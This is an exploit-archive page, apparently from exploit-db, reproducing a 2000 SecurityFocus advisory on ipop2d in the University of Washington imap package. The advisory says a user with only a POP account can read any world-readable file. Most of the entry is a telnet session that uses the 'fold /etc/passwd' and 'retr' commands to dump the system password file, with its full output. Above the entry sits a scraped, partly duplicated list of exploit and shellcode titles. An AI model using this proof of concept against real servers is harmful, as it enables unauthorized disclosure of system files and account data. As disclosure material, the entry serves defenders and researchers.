
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
70 lines
No EOL
2.8 KiB
Text
70 lines
No EOL
2.8 KiB
Text
source: https://www.securityfocus.com/bid/1484/info
|
|
|
|
A vulnerability exists in versions of the ipop2d daemon, through version 4.55. ipop2d is part of the University of Washington imap package. Versions through 4.7c of the imap package are affected. Any user who has a pop account on the machine can view any world or group readable file on the file system. While on a shell account this is not a vulnerability, on a machine where a user only has POP access, this could result in the disclosure of information that might be useful in gaining information about other users on the system. This could in turn potentially be used to gain further access to the machine.
|
|
|
|
For this vulnerability to exist, the user must have an account on the system in question. This account does not need shell level access.
|
|
|
|
ipop2d, and the imap package, will run on many varieties of Unix and Unix-like operating systems.
|
|
|
|
[mandark@mandark mandark]$ telnet localhost 109
|
|
Trying 127.0.0.1...
|
|
Connected to localhost.localdomain.
|
|
Escape character is '^]'.
|
|
+ POP2 localhost.localdomain v4.46 server ready
|
|
helo mandark blehpasshere
|
|
#1 messages in /var/spool/mail/mandark
|
|
read 1
|
|
=389 characters in message 1
|
|
retr
|
|
Return-Path: <root@mandark.jumpline.com>
|
|
Received: (from root@localhost)
|
|
by mandark.jumpline.com (8.10.1/8.10.1) id e6EGS7C27037
|
|
for mandark@localhost; Fri, 14 Jul 2000 12:28:07 -0400
|
|
Date: Fri, 14 Jul 2000 12:28:07 -0400
|
|
From: root <root@mandark.jumpline.com>
|
|
Message-Id: <200007141628.e6EGS7C27037@mandark.jumpline.com>
|
|
To: mandark@mandark.jumpline.com
|
|
Status: RO
|
|
|
|
message is here...
|
|
|
|
acks
|
|
=0 No more messages
|
|
fold /etc/passwd
|
|
#1 messages in /etc/passwd
|
|
read 1
|
|
=1178 characters in message 1
|
|
retr
|
|
Date: Thu, 13 Jul 2000 16:50:07 -0400
|
|
From: root@mandark.jumpline.com
|
|
Subject: /etc/passwd
|
|
MIME-Version: 1.0
|
|
Content-Type: TEXT/PLAIN; charset=US-ASCII
|
|
Status:
|
|
|
|
root:x:0:0:root:/root:/bin/bash
|
|
bin:x:1:1:bin:/bin:
|
|
daemon:x:2:2:daemon:/sbin:
|
|
lp:x:4:7:lp:/var/spool/lpd:
|
|
sync:x:5:0:sync:/sbin:/bin/sync
|
|
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
|
|
halt:x:7:0:halt:/sbin:/sbin/halt
|
|
mail:x:8:12:mail:/var/spool/mail:
|
|
news:x:9:13:news:/var/spool/news:
|
|
uucp:x:10:14:uucp:/var/spool/uucp:
|
|
operator:x:11:0:operator:/root:
|
|
games:x:12:100:games:/usr/games:
|
|
gopher:x:13:30:gopher:/usr/lib/gopher-data:
|
|
ftp:x:14:50:FTP User:/home/ftp:
|
|
nobody:x:99:99:Nobody:/:
|
|
xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/false
|
|
postfix:x:101:104:postfix:/var/spool/postfix:
|
|
gdm:x:0:0::/home/gdm:/bin/bash
|
|
mandark:x:500:503::/home/mandark:/bin/bash
|
|
godie:x:0:0::/home/godie:/bin/bash
|
|
mp3:x:501:506::/mp3:/bin/bash
|
|
chefo:x:502:507::/home/chefo:/bin/bash
|
|
crunch:x:503:508::/home/crunch:/bin/bash
|
|
gsx:x:505:510::/home/gsx:/bin/csh
|
|
matt:x:506:511::/home/matt:/bin/bash
|
|
lyw0d:x:507:512::/home/lyw0d:/bin/bash |